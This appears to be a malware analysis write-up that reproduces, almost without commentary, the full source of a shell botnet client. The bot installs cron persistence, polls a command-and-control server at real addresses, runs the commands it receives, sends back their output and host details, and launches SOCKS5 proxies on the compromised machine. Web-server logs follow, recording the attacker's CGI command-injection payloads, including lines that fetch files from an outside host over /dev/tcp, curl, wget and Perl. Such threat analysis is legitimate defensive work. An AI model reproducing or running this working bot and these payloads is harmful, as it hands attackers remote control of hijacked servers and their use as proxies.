“.src.sh” is a simple bot written in shell, reproduced below. The first part of the script tries to install a “.cron.sh” script from hxxp://116.203.212.184/1010/cron.php for persistence. The main loop sleeps for 300 second intervals and then queries hxxp://116.203.212.184/1010/cmd.php for instructions.

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:$(pwd)/.api/.mnc/bin
kpid=$(tail -n 1 .spid 2> /dev/null)
printf %b "$(id -u)\\n$$" > .spid
kill -kill $kpid > /dev/null 2>&1
#echo $(ps -o ppid= $$) | xargs kill -9 > /dev/null 2>&1

ICURL="curl"
if [ ! "$(command -v curl 2> /dev/null)" ]; then
        ICURL="./.curl"
fi

CURL=$ICURL
DOM="rr.blueheaven.live"
if [ -f ".interface" ]; then
        CURL="$ICURL --interface "$(cat .interface 2> /dev/null)
        DOM="116.203.212.184"
fi

if [ ! -f ".cron.sh" ]; then
        out=$($CURL -s http://$DOM/1010/cron.php -u client:%@123-456@% 2> /dev/null)
        enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
        base=$(echo $out | awk '{split($0,a,","); print a[2]}')
        if [ "$enable" -eq "1" ]; then
                printf %b "$($CURL -s http://$DOM/1010/b64.php -u client:%@123-456@% --data-urlencode "s=$base" 2> /dev/null)" > .cron.sh 2> /dev/null && chmod +x .cron.sh > /dev/null 2>&1
        fi
fi

string="$(crontab -l 2> /dev/null)"
word="0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &"
if [ ! "${string#*$word}" != "$string" ]; then
        crcount=$(printf %s $(crontab -l 2> /dev/null) | wc -m)
        if [ "$crcount" -gt "0" ]; then
                printf %b "$(crontab -l 2> /dev/null)\\n0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n@reboot cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n" > .cron
                cat .cron | crontab || crontab .cron
        else
                if [ "$(id -u)" -eq "0" ]; then
                        printf %b "0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n@reboot cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n" > .cron
                        cat .cron | crontab || crontab .cron
                else
                        printf %b "PATH=/sbin:/bin:/usr/sbin:/usr/bin\\nHOME=$(pwd)\\nMAILTO=\"\"\\n0 */12 * * * cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n@reboot cd $(pwd) && sh .cron.sh > /dev/null 2>&1 &\\n" > .cron
                        cat .cron | crontab || crontab .cron
                fi
        fi
fi

psfunc()
{
        if [ "$(command -v ps 2> /dev/null)" ]; then
                ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null
        else
                if [ "$(command -v pgrep 2> /dev/null)" ]; then
                        pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null
                else
                        if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then
                                pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done
                        else
                                printf %b "0\n"
                        fi
                fi

        fi
}

timeout=""
if [ "$(command -v timeout 2> /dev/null)" ]; then
        timeout="timeout 15"
fi

if [ -f ".python" ]; then
        export PYTHONUSERBASE=$(cat .python 2> /dev/null)
fi

first=0
tstmp=0
while true
do
        slp=300
        out=$($timeout $CURL -s --data-urlencode "icid=$(cat .cid 2> /dev/null)" --data-urlencode "vuln=$(cat .pinfo 2> /dev/null)" --data-urlencode "ips=$(cat .api/ips.txt 2> /dev/null | wc -l 2> /dev/null)" --data-urlencode "prx=$(psfunc 'python -m pproxy')" --data-urlencode "mnc=$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'print(1)' 2> /dev/null)" --data-urlencode "rm=$(($(a=$(echo $(cat /proc/meminfo 2> /dev/null) | grep MemTotal | cut -d' ' -f2); if [ "$a" -gt "0" 2> /dev/null ]; then echo $a;else echo 0;fi)/1024))" --data-urlencode "cr=$(nproc 2> /dev/null)" --data-urlencode "a=$(whoami 2> /dev/null)" --data-urlencode "o=$(cat /etc/*-release 2> /dev/null || uname -a)" -X POST http://$DOM/1010/cmd.php -u client:%@123-456@% 2> /dev/null || echo "0,0,0,0,0,0,0")
        enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
        cmd=$(echo $out | awk '{split($0,a,","); print a[2]}')
        tm=$(echo $out | awk '{split($0,a,","); print a[3]}')
        pv=$(echo $out | awk '{split($0,a,","); print a[4]}')
        prx=$(echo $out | awk '{split($0,a,","); print a[5]}')
        port=$(echo $out | awk '{split($0,a,","); print a[6]}')
        pass=$(echo $out | awk '{split($0,a,","); print a[7]}')
        if [ "$pv" -gt "0" ]; then
                printf %b "$pv\\n" > .cid
        fi
        if [ "$pv" -gt "0" -a "$first" -gt "0" ]; then
                if [ ! -f ".api/ips.txt" -a ! -f ".exec" ]; then
                        mkdir -p .api
                        ipsr=""
                        if [ "$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'import netifaces;print(1)' 2> /dev/null)" -eq "1" ]; then
                                ipsr=$(export HOME=$(pwd)/.api; printf %b "import netifaces\\nfor iface in netifaces.interfaces():\\n\\tiface_details = netifaces.ifaddresses(iface)\\n\\tif netifaces.AF_INET in iface_details:\\n\\t\\tfor ip in iface_details[netifaces.AF_INET]:\\n\\t\\t\\tprint(ip['addr']+'/'+ip['netmask'])" | $HOME/.mnc/bin/python | grep -v 127.0.0.1 | tr '\\n' ' ')
                        else
                                if [ "$(command -v ip 2> /dev/null)" ]; then
                                        ipsr=$(ip addr | grep 'inet ' | awk -F' ' '{print $2}' | grep -v '127.0.0.1' | tr '\\n' ' ')
                                else
                                        if [ "$(command -v ifconfig 2> /dev/null)" ]; then
                                                ipsr=$( ifconfig | grep 'inet ' |  awk '{split($0,a,"inet "); print a[2]}' | awk '{split($0,a," netmask"); print a[1]"/32"}' | grep -v '127.0.0.1' | tr '\\n' ' ')
                                        fi
                                fi
                        fi

                        if [ "$ipsr" != "" ]; then
                                for range in $ipsr; do
                                        ips=$($CURL -s http://$DOM/1010/ip.php -u client:%@123-456@% --data-urlencode "r=$range" 2> /dev/null)
                                        for ip1 in $ips; do

                                                out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                                enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                                pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                                port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                                enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                                wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                                if [ "$enproxy" -eq "1" -a ! "$(grep "$wip" ".api/ips.txt" 2> /dev/null)" ]; then
                                                        printf %b "$ip1,$wip\\n" >> .api/ips.txt
                                                fi

                                        done
                                done
                        else
                                if [ "$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'print(1)' 2> /dev/null)" -eq "1" ]; then
                                        ip1=$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c "import socket;s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.connect(('8.8.8.8', 80));print(s.getsockname()[0]);s.close()" 2> /dev/null)
                                        out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                        enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                        pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                        port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                        enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                        wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                        if [ "$enproxy" -eq "1" -a ! "$(grep "$wip" ".api/ips.txt" 2> /dev/null)" ]; then
                                                printf %b "$ip1,$wip\\n" >> .api/ips.txt
                                        fi
                                fi
                        fi
                else
                        if [ "$(($(date +%s)-$tstmp))" -ge "300" -a "$(export HOME=$(pwd)/.api;$HOME/.mnc/bin/python -c 'print(1)' 2> /dev/null)" -eq "1" ]; then
                                tstmp=$(date +%s)
                                case $prx in
                                        "0")
                                                pkill -9 -f "python -m pproxy" > /dev/null 2>&1
                                                ;;
                                        "1")
                                                pkill -9 -f "python -m pproxy -l socks5://" > /dev/null 2>&1
                                                ips=$(cat .api/ips.txt | tr '\\n' ' ')
                                                for ip in $ips; do
                                                        ip1=$(echo $ip | awk '{split($0,a,","); print a[1]}')
                                                        if [ ! "$(psfunc "$ip1" 2> /dev/null)" ]; then

                                                                out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                                                enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                                                pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                                                port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                                                enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                                                wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                                                if [ "$enproxy" -eq "1" ]; then
                                                                        sh -c "cd .api/.mnc/bin && ./python -m pproxy -l socks5+in://$pip:$port/@$ip1,#pproxy:$pass > /dev/null 2>&1 &" > /dev/null 2>&1
                                                                fi

                                                        fi
                                                done
                                                ;;
                                        "2")
                                                pkill -9 -f "python -m pproxy -l socks5\+in://" > /dev/null 2>&1
                                                if [ ! "$(psfunc "python -m pproxy -l socks5://:$port" 2> /dev/null)" ]; then
                                                        pkill -9 -f "python -m pproxy -l socks5://" > /dev/null 2>&1
                                                        sh -c "cd .api/.mnc/bin && ./python -m pproxy -l socks5://:$port/@in,#pproxy:$pass > /dev/null 2>&1 &" > /dev/null 2>&1
                                                fi
                                                ;;
                                        "3")
                                                pkill -9 -f "python -m pproxy -l socks5://" > /dev/null 2>&1
                                                ips=$(cat .api/ips.txt | tr '\\n' ' ')
                                                for ip in $ips; do
                                                        ip1=$(echo $ip | awk '{split($0,a,","); print a[1]}')

                                                        out=$($ICURL -s --interface $ip1 --connect-timeout 2 --data-urlencode "cid=$pv" -X POST http://$DOM/1010/iprv.php -u client:%@123-456@% 2> /dev/null)
                                                        enproxy=$(echo $out | awk '{split($0,a,","); print a[1]}')
                                                        pip=$(echo $out | awk '{split($0,a,","); print a[2]}')
                                                        port=$(echo $out | awk '{split($0,a,","); print a[3]}')
                                                        enb=$(echo $out | awk '{split($0,a,","); print a[4]}')
                                                        wip=$(echo $out | awk '{split($0,a,","); print a[5]}')

                                                        if [ "$enproxy" -eq "1" -a "$enb" -eq "1" -a ! "$(psfunc "$ip1" 2> /dev/null)" ]; then
                                                                sh -c "cd .api/.mnc/bin && ./python -m pproxy -l socks5+in://$pip:$port/@$ip1,#pproxy:$pass > /dev/null 2>&1 &" > /dev/null 2>&1
                                                        fi

                                                        if [ "$enproxy" -eq "1" -a "$enb" -eq "0" ]; then
                                                                pkill -9 -f "/@$ip1,#pproxy:" > /dev/null 2>&1
                                                        fi
                                                done
                                                ;;
                                esac
                        fi
                fi
        fi
        if [ "$tm" -eq "1" ]; then
                slp=1
        fi
        if [ "$enable" -eq "1" ]; then
                ex=$(sh -c "$cmd" 2>&1)
                $CURL -s --data-urlencode "icid=$(cat .cid 2> /dev/null)" --data-urlencode "reponse=$ex" -X POST http://$DOM/1010/post.php -u client:%@123-456@% 2> /dev/null
        fi
        if [ "$first" -eq "0" ]; then
                first=1
                sleep 1
        else
                sleep $slp
        fi
done

Nov 27 and beyond – more shell code, less base64

Looking at the mod_dumpio output from Nov 27 and beyond, the adversary abandons base64 encoding and just sends unobfuscated shell payloads.

[Sat Nov 27 17:02:58.280572 2021]  A=|echo;printf vulnable
[Sun Nov 28 16:55:25.395499 2021]  A=|echo;echo vulnable
[Sun Nov 28 16:57:23.515598 2021]  A=|echo;a%3Dvulnable%3Becho%20%24a
[Sun Nov 28 16:57:23.786609 2021] [cgi:error]  /bin/sh: 1: a%3Dvulnable%3Becho%20%24a: not found: /bin/sh
[Sun Nov 28 16:57:24.018519 2021]  A=|echo;a%3Dvulnable%3Becho%20%24a
[Sun Nov 28 16:57:24.410051 2021] [cgi:error]  /bin/bash: line 1: a%3Dvulnable%3Becho%20%24a: command not found: /bin/bash
[Sun Nov 28 16:58:21.167696 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 16:58:21.208503 2021] [cgi:error] [pid 2632:tid 139978638071552] [client 116.202.187.77:34884] End of script output before headers: sh
[Sun Nov 28 16:58:21.467744 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 16:58:21.578078 2021] [cgi:error] [pid 2632:tid 139978780681984] [client 116.202.187.77:34914] End of script output before headers: bash
[Sun Nov 28 16:59:14.868614 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 16:59:14.899091 2021] [cgi:error] [pid 2632:tid 139978646464256] [client 116.202.187.77:35060] End of script output before headers: sh
[Sun Nov 28 16:59:15.119808 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 16:59:15.180240 2021] [cgi:error] [pid 2539:tid 139978327705344] [client 116.202.187.77:35080] End of script output before headers: bash
[Sun Nov 28 17:00:50.203622 2021]  A=|echo;echo vulnable
[Sun Nov 28 17:01:46.202310 2021]  A=%7Cecho%3Becho+vulnable
[Sun Nov 28 17:01:46.243062 2021] [cgi:error] [pid 2632:tid 139978503853824] [client 116.202.187.77:35302] End of script output before headers: sh
[Sun Nov 28 17:01:46.514360 2021]  A=%7Cecho%3Becho+vulnable
[Sun Nov 28 17:01:46.584288 2021] [cgi:error] [pid 2539:tid 139978461923072] [client 116.202.187.77:35330] End of script output before headers: bash
[Sun Nov 28 17:02:38.990088 2021]  A=%7Cecho%253Becho%2520vulnable
[Sun Nov 28 17:02:39.030402 2021] [cgi:error] [pid 1693:tid 139978914899712] [client 116.202.187.77:35484] End of script output before headers: sh
[Sun Nov 28 17:02:39.281646 2021]  A=%7Cecho%253Becho%2520vulnable
[Sun Nov 28 17:02:39.362302 2021] [cgi:error] [pid 2632:tid 139978545817344] [client 116.202.187.77:35502] End of script output before headers: bash
[Sun Nov 28 17:03:13.639471 2021]  A%253D%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:13.699553 2021] [cgi:error]  /bin/sh: 1: : /bin/sh
[Sun Nov 28 17:03:13.699763 2021] [cgi:error]  A%253D%257Cecho%253Becho%2520vulnable: not found: /bin/sh
[Sun Nov 28 17:03:13.699802 2021] [cgi:error]  : /bin/sh
[Sun Nov 28 17:03:13.700009 2021] [cgi:error] [pid 2539:tid 139978478708480] [client 116.202.187.77:35642] End of script output before headers: sh
[Sun Nov 28 17:03:13.946964 2021]  A%253D%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:14.044809 2021] [cgi:error]  /bin/bash: line 1: A%253D%257Cecho%253Becho%2520vulnable: command not found: /bin/bash
[Sun Nov 28 17:03:14.064043 2021] [cgi:error] [pid 2632:tid 139978688427776] [client 116.202.187.77:35664] End of script output before headers: bash
[Sun Nov 28 17:03:42.715779 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:42.715930 2021] [cgi:error] [pid 2539:tid 139978310919936] [client 116.202.187.77:35814] End of script output before headers: sh
[Sun Nov 28 17:03:42.967866 2021]  A=%257Cecho%253Becho%2520vulnable
[Sun Nov 28 17:03:43.048351 2021] [cgi:error] [pid 2632:tid 139978512246528] [client 116.202.187.77:35832] End of script output before headers: bash
[Sun Nov 28 17:04:04.539353 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 17:04:04.559961 2021] [cgi:error] [pid 2632:tid 139978537424640] [client 116.202.187.77:35978] End of script output before headers: sh
[Sun Nov 28 17:04:04.951514 2021]  A=%7Cecho%3Becho%20vulnable
[Sun Nov 28 17:04:05.213226 2021] [cgi:error] [pid 2632:tid 139978680035072] [client 116.202.187.77:36004] End of script output before headers: bash
[Sun Nov 28 17:09:32.521939 2021]  A=|echo;a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo vulnable; fi
[Sun Nov 28 17:32:12.024183 2021]  A=|echo;echo done
[Sun Nov 28 17:32:12.307559 2021]  A=|echo;echo done
[Sun Nov 28 17:32:48.782254 2021]  A=|echo;echo vulnable
[Sun Nov 28 17:39:57.475699 2021]  A=|echo;echo vulnable
[Sun Nov 28 17:40:38.123955 2021]  A=|echo;echo done;echo vulnable
[Sun Nov 28 17:42:19.620086 2021]  A=|echo;a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo done; fi;echo vulnable
[Sun Nov 28 17:44:07.177445 2021]  A=|echo;psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo 'psfunc'; fi; }; psfunc ;echo vulnable
[Sun Nov 28 17:44:49.689632 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo 'psfunc'; fi; }; psfunc;echo vulnable
[Sun Nov 28 17:46:15.189899 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo "$1"; fi; }; psfunc ps;echo vulnable
[Sun Nov 28 17:46:41.752037 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" ]; then echo "$1"; fi; }; psfunc 'ps';echo vulnable
[Sun Nov 28 17:48:14.564918 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" && "1" -gt "0" ]; then echo "$1"; fi; }; psfunc 'ps';echo vulnable
[Sun Nov 28 17:48:14.625501 2021] [cgi:error]  /bin/sh: 1: [: missing ]: /bin/sh
[Sun Nov 28 17:48:43.928639 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { a=1;if [ "$(echo $a 2>&1)" -gt "0" -a "1" -gt "0" ]; then echo "$1"; fi; }; psfunc 'ps';echo vulnable
[Sun Nov 28 18:47:07.257086 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  }; if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 12345; else echo 00000; fi;echo vulnable
[Sun Nov 28 18:51:57.797516 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" ]; then echo 'False'; else 'True'; fi;echo vulnable
[Sun Nov 28 18:51:57.908907 2021] [cgi:error]  /bin/sh: 1: True: not found: /bin/sh
[Sun Nov 28 18:53:07.428691 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 18:55:09.609280 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ssh 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 18:57:57.577951 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ssh 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 18:58:32.809620 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:01:10.973735 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:02:17.249849 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v python 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:03:53.430460 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v lwp-download 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:04:45.663570 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v cp 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:05:40.047965 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v php 2> /dev/null)" -a ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:06:13.974648 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v php 2> /dev/null)" -a ! "$(command -v php-cgi 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:11:51.013324 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v php 2> /dev/null)" -a ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:12:34.739533 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:14:05.110790 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 19:56:57.657280 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" -a ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:00:34.841791 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-;  };  if [ ! "$(get http://94.130.181.216/test.txt 2> /dev/null)" -eq "11223344" 2> /dev/null ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:06:17.028826 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v timeout 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:08:15.277127 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-;  };  if [ ! "$(timeout 5 get http://94.130.181.216/test.txt 2> /dev/null)" -eq "11223344" 2> /dev/null -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:24:13.153432 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-;  };  if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:25:06.378246 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:26:26.246581 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; echo vulnable; get() { read proto server path <<<$(echo ${1//// }); DOC=/${path// //};  HOST=${server//:*};  PORT=${server//*:};  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80;  exec 3<>/dev/tcp/${HOST}/${PORT};  printf %b "GET ${DOC} HTTP/1.0\\r\\nhost: ${HOST}\\r\\nConnection: close\\r\\n\\r\\n" >&3;  (while read line; do [[ "$line" == $'\\r' ]] && break;  done && cat) <&3;  exec 3>&-; }; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi
[Sun Nov 28 20:36:50.047761 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:39:29.171795 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v perl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 23:37:29.866905 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;a=$(echo "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr=>'94.130.181.216',PeerPort =>'80',Proto => 'tcp');die \\"Could not create socket: \\$!\\\\n\\" unless \\$sock;print \\$sock \\"GET /test.txt HTTP/1.0\\\\r\\\\n\\\\r\\\\n\\";my \\$a=0;while( \\$line = <\\$sock>) { print \\$line if(\\$a > 0); \\$a = 1 if(\\$line eq \\"\\\\r\\\\n\\");} close(\\$sock);" | timeout 5 perl);if [ ! "$a" -eq "11223344" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:01:19.183357 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;a='00000000';if [ "$(command -v curl 2> /dev/null)" ]; then echo 'curl';a=$(timeout 5 curl -s http://94.130.181.216/test.txt 2> /dev/null); else if [ "$(command -v wget 2> /dev/null)" ]; then echo 'wget';a=$(timeout 5 wget http://94.130.181.216/test.txt -qO- 2> /dev/null); else if [ "$(command -v perl 2> /dev/null)" ]; then echo 'perl';a=$(echo "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr=>'94.130.181.216',PeerPort =>'80',Proto => 'tcp');die \\"Could not create socket: \\$!\\\\n\\" unless \\$sock;print \\$sock \\"GET /test.txt HTTP/1.0\\\\r\\\\n\\\\r\\\\n\\";my \\$a=0;while( \\$line = <\\$sock>) { print \\$line if(\\$a > 0); \\$a = 1 if(\\$line eq \\"\\\\r\\\\n\\");} close(\\$sock);" | timeout 5 perl); else echo 'No cmd'; fi; fi; fi; if [ ! "$a" -eq "11223344" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
